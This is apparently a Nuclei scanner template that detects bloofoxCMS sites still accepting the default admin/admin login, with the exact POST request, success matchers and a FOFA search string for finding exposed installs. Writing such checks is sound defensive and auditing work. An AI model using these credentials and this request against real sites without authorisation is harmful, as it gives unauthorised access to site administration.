id: bloofoxcms-default-login

info:
  name: bloofoxCMS - Default Login
  author: theamanrawat
  severity: high
  description: |
    bloofoxCMS contains default credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
  reference:
    - https://www.bloofox.com/automated_setup.113.html
    - https://www.bloofox.com
  metadata:
    verified: "true"
    max-request: 1
    fofa-query: "Powered by bloofoxCMS"
  tags: bloofox,cms,default-login

http:
  - raw:
      - |
        POST /admin/index.php HTTP/2
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username={{username}}&password={{password}}&action=login

    attack: pitchfork
    payloads:
      username:
        - "admin"
      password:
        - "admin"
    redirects: true
    max-redirects: 2
    matchers:
      - type: dsl
        dsl:
          - contains(body, 'bloofoxCMS Admincenter')
          - status_code == 200
        condition: and

# digest: 4b0a00483046022100b9ba4676dd13debd11f72527dcd0e4bc7cd120efb61658f9e7270fe85c3b9b9b022100d82c3493478c008849f179f16de4746febc9b91f6ee3c1bbadcff8652341c03f:922c64590222798bb761d5b6d8e72950
